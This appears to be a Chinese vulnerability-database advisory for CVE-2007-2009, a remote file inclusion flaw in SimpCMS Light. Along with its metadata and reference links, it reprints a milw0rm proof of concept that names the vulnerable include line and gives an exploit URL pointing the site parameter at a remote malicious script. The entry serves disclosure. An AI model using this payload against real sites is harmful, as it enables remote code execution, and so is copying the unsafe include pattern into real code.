SimpCMS Light 'Index.PHP' 远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1112669 漏洞类型 输入验证
发布时间 2007-04-10 更新时间 2007-04-13
CVE编号 CVE-2007-2009 CNNVD-ID CNNVD-200704-226
漏洞平台 PHP CVSS评分 6.8
|漏洞来源
https://www.exploit-db.com/exploits/3705
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200704-226
|漏洞详情
SimpCMSLight的index.php中存在PHP远程文件包含漏洞。远程攻击者可以借助站点参数中的一个URL,执行任意的PHP代码。
|漏洞EXP
Bug Found By Dr.RoVeR -->Arab48 Hacker

Contact: Dr.RoVeR@HackerMail.CoM
---

Script: SimpCMS Light

Download: http://www.simpcms.com/light/normal/simp-cms-light.zip

--

Bug File: index.php

Bug code in line 31:
include $site.".php";

--

Exploit:
http://site.com/[path]/index.php?site=[EvilScript]

# milw0rm.com [2007-04-10]
|参考资料

来源:MILW0RM
名称:3705
链接:http://www.milw0rm.com/exploits/3705
来源:VIM
名称:20070412true:SimpCMSLightRFI
链接:http://www.attrition.org/pipermail/vim/2007-April/001513.html
来源:XF
名称:simpcms-index-file-include(33572)
链接:http://xforce.iss.net/xforce/xfdb/33572
来源:BID
名称:23439
链接:http://www.securityfocus.com/bid/23439
来源:BUGTRAQ
名称:20070411Newbug:)
链接:http://www.securityfocus.com/archive/1/archive/1/465343/100/100/threaded
来源:VUPEN
名称:ADV-2007-1348
链接:http://www.frsirt.com/english/advisories/2007/1348
来源:SECUNIA
名称:24851
链接:http://secunia.com/advisories/24851